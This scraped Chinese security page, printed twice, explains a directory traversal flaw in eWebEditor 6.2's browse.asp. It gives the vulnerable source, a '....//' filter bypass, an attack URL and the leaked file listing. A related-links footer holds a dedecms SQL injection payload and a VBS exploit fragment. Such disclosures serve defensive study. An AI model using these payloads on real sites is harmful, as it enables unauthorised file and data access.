eWebEditor 6.2 目錄遍歷漏洞(asp/browse.asp)
發(fā)布時(shí)間:2010-05-13 13:53:18 作者:佚名
我要評(píng)論

最新eWebEditor 6.2版本存在目錄遍歷漏洞,漏洞頁面asp/browse.asp,可通過漏洞遍里特定目錄下的所有文件列表.
asp/browse.asp部分源碼:
Dim s_ReturnFlag, s_FolderType, s_Dir
Dim s_CurrDir
s_ReturnFlag = Trim(Request.QueryString("returnflag"))
s_FolderType = Trim(Request.QueryString("foldertype"))
s_Dir = Trim(Request("dir"))
Select Case s_FolderType
Case "upload"
s_CurrDir = sUploadDir
Case "shareimage"
sAllowExt = ""
s_CurrDir = sPathShareImage
Case "shareflash"
sAllowExt = ""
s_CurrDir = sPathShareFlash
Case "sharemedia"
sAllowExt = ""
s_CurrDir = sPathShareMedia
Case Else
s_FolderType = "shareother"
sAllowExt = ""
s_CurrDir = sPathShareOther
End Select
s_Dir = Replace(s_Dir, "\", "/")
'下面兩行是對(duì)目錄跳轉(zhuǎn)的處理,漏洞存在于此處
s_Dir = Replace(s_Dir, "../", "") '替換../為空
s_Dir = Replace(s_Dir, "./", "") '替換./為空
If Left(s_Dir,1)="/" Then
s_Dir = ""
End If
Dim s_Dir2
s_Dir2 = Replace(s_Dir, "/", "\")
If s_Dir <> "" Then
If CheckValidDir(s_CurrDir & s_Dir2) = True Then
s_CurrDir = s_CurrDir & s_Dir2
Else
s_Dir = ""
End If
End If
代碼對(duì)../和./進(jìn)行過濾用來防止目錄跳轉(zhuǎn),但可以通過構(gòu)造參數(shù)饒過檢測.由于檢測替換只進(jìn)行一次可以使用....//代替上級(jí)目錄,程序替換后....//變成../
攻擊代碼示例:
http://localhost/asp/browse.asp?action=file&type=file&dir=.....///DiaLog&style=full650&cusdir=&foldertype=upload&returnflag=span_upload
跳轉(zhuǎn)到上eWebEditor的DiaLog目錄,查看返回頁面的源文件:
<HTML><HEAD><meta http-equiv='Content-Type' content='text/html; charset=gb2312'><TITLE>eWebEditor</TITLE></head><body><script language=javascript>var arr = new Array();
arr[0]=new Array("about.htm", "1.85 KB","2009-05-29 16:27:06");
arr[1]=new Array("anchor.htm", "3.68 KB","2009-05-13 16:39:40");
arr[2]=new Array("art.htm", "49.55 KB","2009-05-13 16:39:40");
arr[3]=new Array("backimage.htm", "9.46 KB","2009-05-13 16:39:42");
arr[4]=new Array("browse.htm", "20.74 KB","2009-05-13 16:39:42");
arr[5]=new Array("dialog.js", "6.44 KB","2009-05-13 22:39:08");
arr[6]=new Array("emot.htm", "3.26 KB","2009-05-13 16:39:42");
arr[7]=new Array("EQ.htm", "3.48 KB","2009-05-14 00:02:20");
arr[8]=new Array("eWebEditorActiveX.CAB", "1118.08 KB","2009-05-14 00:18:40");
arr[9]=new Array("eWebEditorActiveXInstall.exe", "1190.72 KB","2009-04-11 23:12:48");
arr[10]=new Array("fieldset.htm", "4.11 KB","2009-05-13 16:39:42");
arr[11]=new Array("file.htm", "5.52 KB","2009-05-13 16:39:42");
arr[12]=new Array("findreplace.htm", "2.82 KB","2009-05-13 16:39:42");
arr[13]=new Array("flash.htm", "14.43 KB","2009-05-13 16:39:42");
arr[14]=new Array("fullscreen.htm", "0.84 KB","2009-05-13 16:39:42");
arr[15]=new Array("hyperlink.htm", "4.43 KB","2009-05-13 16:39:42");
arr[16]=new Array("iFrame.htm", "4.24 KB","2009-05-14 00:31:30");
arr[17]=new Array("img.htm", "13.25 KB","2009-05-13 16:39:42");
arr[18]=new Array("importexcel.htm", "5.87 KB","2009-05-13 16:39:42");
arr[19]=new Array("importword.htm", "8.44 KB","2009-05-13 16:39:42");
arr[20]=new Array("installactivex.htm", "2.02 KB","2009-05-13 16:39:42");
arr[21]=new Array("i_upload.htm", "7.95 KB","2009-05-13 22:41:40");
arr[22]=new Array("map.htm", "4.13 KB","2009-05-13 16:39:42");
arr[23]=new Array("marquee.htm", "2.44 KB","2009-05-13 16:39:42");
arr[24]=new Array("media.htm", "5.07 KB","2009-05-13 16:39:42");
arr[25]=new Array("owcexcel.htm", "2.64 KB","2009-05-13 16:39:42");
arr[26]=new Array("paragraph.htm", "5.95 KB","2009-05-13 16:39:42");
arr[27]=new Array("paste.htm", "4.50 KB","2009-05-13 16:39:42");
arr[28]=new Array("quickformat.htm", "13.58 KB","2009-05-13 16:39:42");
arr[29]=new Array("selcolor.htm", "14.93 KB","2009-05-13 16:39:42");
arr[30]=new Array("symbol.htm", "14.61 KB","2009-05-13 16:39:42");
arr[31]=new Array("table.htm", "11.71 KB","2009-05-13 16:39:42");
arr[32]=new Array("tablecell.htm", "7.98 KB","2009-05-13 16:39:42");
arr[33]=new Array("tablecellsplit.htm", "2.55 KB","2009-05-13 16:39:42");
arr[34]=new Array("template.htm", "4.50 KB","2009-05-13 16:39:42");
arr[35]=new Array("WebEQInstall.cab", "1123.39 KB","2009-05-14 00:16:16");
parent.setFileList('span_upload', 'upload', '../DiaLog', arr);</script></body></html>
復(fù)制代碼
代碼如下:Dim s_ReturnFlag, s_FolderType, s_Dir
Dim s_CurrDir
s_ReturnFlag = Trim(Request.QueryString("returnflag"))
s_FolderType = Trim(Request.QueryString("foldertype"))
s_Dir = Trim(Request("dir"))
Select Case s_FolderType
Case "upload"
s_CurrDir = sUploadDir
Case "shareimage"
sAllowExt = ""
s_CurrDir = sPathShareImage
Case "shareflash"
sAllowExt = ""
s_CurrDir = sPathShareFlash
Case "sharemedia"
sAllowExt = ""
s_CurrDir = sPathShareMedia
Case Else
s_FolderType = "shareother"
sAllowExt = ""
s_CurrDir = sPathShareOther
End Select
s_Dir = Replace(s_Dir, "\", "/")
'下面兩行是對(duì)目錄跳轉(zhuǎn)的處理,漏洞存在于此處
s_Dir = Replace(s_Dir, "../", "") '替換../為空
s_Dir = Replace(s_Dir, "./", "") '替換./為空
If Left(s_Dir,1)="/" Then
s_Dir = ""
End If
Dim s_Dir2
s_Dir2 = Replace(s_Dir, "/", "\")
If s_Dir <> "" Then
If CheckValidDir(s_CurrDir & s_Dir2) = True Then
s_CurrDir = s_CurrDir & s_Dir2
Else
s_Dir = ""
End If
End If
代碼對(duì)../和./進(jìn)行過濾用來防止目錄跳轉(zhuǎn),但可以通過構(gòu)造參數(shù)饒過檢測.由于檢測替換只進(jìn)行一次可以使用....//代替上級(jí)目錄,程序替換后....//變成../
攻擊代碼示例:
http://localhost/asp/browse.asp?action=file&type=file&dir=.....///DiaLog&style=full650&cusdir=&foldertype=upload&returnflag=span_upload
跳轉(zhuǎn)到上eWebEditor的DiaLog目錄,查看返回頁面的源文件:
復(fù)制代碼
代碼如下:<HTML><HEAD><meta http-equiv='Content-Type' content='text/html; charset=gb2312'><TITLE>eWebEditor</TITLE></head><body><script language=javascript>var arr = new Array();
arr[0]=new Array("about.htm", "1.85 KB","2009-05-29 16:27:06");
arr[1]=new Array("anchor.htm", "3.68 KB","2009-05-13 16:39:40");
arr[2]=new Array("art.htm", "49.55 KB","2009-05-13 16:39:40");
arr[3]=new Array("backimage.htm", "9.46 KB","2009-05-13 16:39:42");
arr[4]=new Array("browse.htm", "20.74 KB","2009-05-13 16:39:42");
arr[5]=new Array("dialog.js", "6.44 KB","2009-05-13 22:39:08");
arr[6]=new Array("emot.htm", "3.26 KB","2009-05-13 16:39:42");
arr[7]=new Array("EQ.htm", "3.48 KB","2009-05-14 00:02:20");
arr[8]=new Array("eWebEditorActiveX.CAB", "1118.08 KB","2009-05-14 00:18:40");
arr[9]=new Array("eWebEditorActiveXInstall.exe", "1190.72 KB","2009-04-11 23:12:48");
arr[10]=new Array("fieldset.htm", "4.11 KB","2009-05-13 16:39:42");
arr[11]=new Array("file.htm", "5.52 KB","2009-05-13 16:39:42");
arr[12]=new Array("findreplace.htm", "2.82 KB","2009-05-13 16:39:42");
arr[13]=new Array("flash.htm", "14.43 KB","2009-05-13 16:39:42");
arr[14]=new Array("fullscreen.htm", "0.84 KB","2009-05-13 16:39:42");
arr[15]=new Array("hyperlink.htm", "4.43 KB","2009-05-13 16:39:42");
arr[16]=new Array("iFrame.htm", "4.24 KB","2009-05-14 00:31:30");
arr[17]=new Array("img.htm", "13.25 KB","2009-05-13 16:39:42");
arr[18]=new Array("importexcel.htm", "5.87 KB","2009-05-13 16:39:42");
arr[19]=new Array("importword.htm", "8.44 KB","2009-05-13 16:39:42");
arr[20]=new Array("installactivex.htm", "2.02 KB","2009-05-13 16:39:42");
arr[21]=new Array("i_upload.htm", "7.95 KB","2009-05-13 22:41:40");
arr[22]=new Array("map.htm", "4.13 KB","2009-05-13 16:39:42");
arr[23]=new Array("marquee.htm", "2.44 KB","2009-05-13 16:39:42");
arr[24]=new Array("media.htm", "5.07 KB","2009-05-13 16:39:42");
arr[25]=new Array("owcexcel.htm", "2.64 KB","2009-05-13 16:39:42");
arr[26]=new Array("paragraph.htm", "5.95 KB","2009-05-13 16:39:42");
arr[27]=new Array("paste.htm", "4.50 KB","2009-05-13 16:39:42");
arr[28]=new Array("quickformat.htm", "13.58 KB","2009-05-13 16:39:42");
arr[29]=new Array("selcolor.htm", "14.93 KB","2009-05-13 16:39:42");
arr[30]=new Array("symbol.htm", "14.61 KB","2009-05-13 16:39:42");
arr[31]=new Array("table.htm", "11.71 KB","2009-05-13 16:39:42");
arr[32]=new Array("tablecell.htm", "7.98 KB","2009-05-13 16:39:42");
arr[33]=new Array("tablecellsplit.htm", "2.55 KB","2009-05-13 16:39:42");
arr[34]=new Array("template.htm", "4.50 KB","2009-05-13 16:39:42");
arr[35]=new Array("WebEQInstall.cab", "1123.39 KB","2009-05-14 00:16:16");
parent.setFileList('span_upload', 'upload', '../DiaLog', arr);</script></body></html>
相關(guān)文章
手把手教你如何構(gòu)造Office漏洞POC(以CVE-2012-0158為例)
近年來APT追蹤盛行,最常見的就是各種以釣魚開始的攻擊,不僅僅有網(wǎng)站掛馬式釣魚,也有魚叉式郵件釣魚,下面小編就為大家介紹office漏洞CVE-2012-0158,一起來看看吧2016-09-28- SSL(安全套接字層)逐漸被大家所重視,但是最不能忽視的也是SSL得漏洞,隨著SSL技術(shù)的發(fā)展,新的漏洞也就出現(xiàn)了,下面小編就為大家介紹簡單七步教你如何解決關(guān)鍵SSL安全問題2016-09-23
- 偶爾在網(wǎng)上看到這些,拿來和大家一塊看看,也好讓各個(gè)站長懂得保護(hù)自己的網(wǎng)站2012-10-16
- Ewebeditor編輯器目前分為asp,aspx,php,jsp四種程序,各類ewebeditor版本很多,功能強(qiáng)大頗收使用者喜愛,在國內(nèi)使用極為廣泛。2010-05-13
- 以下是search.inc.php 文件漏洞利用代碼VBS版 [code] Dim strUrl,strSite,strPath,strUid showB() Set Args = Wscript.Arguments If Args.Count <> 3 Then Sho2009-04-18
- 最新dedecms 5.6的注入代碼: http://www.dedecms.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2%29%29%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT%22011-03-11
查找Centos Linux服務(wù)器上入侵者的WebShell后門
服務(wù)器被掛馬或被黑的朋友應(yīng)該知道,黑客入侵web服務(wù)器的第一目標(biāo)是往服務(wù)器上上傳一個(gè)webshell,有了webshell黑客就可以干更多的事 情2012-07-10- 影響2.5.x和2.6.x,其他版本未測試 goods_script.php 44行: [code] if (empty($_GET['type'])) { ... } elseif ($_GET['type'] == 'collection') { ... } $sql2009-04-18
漏洞 自動(dòng)化腳本 論漏洞和自動(dòng)化腳本的區(qū)別
漏洞無處不在,它是在硬件、軟件、協(xié)議的具體實(shí)現(xiàn)或系統(tǒng)安全策略上存在的缺陷,從而可以使攻擊者能夠在未授權(quán)的情況下訪問或破壞系統(tǒng)2016-09-29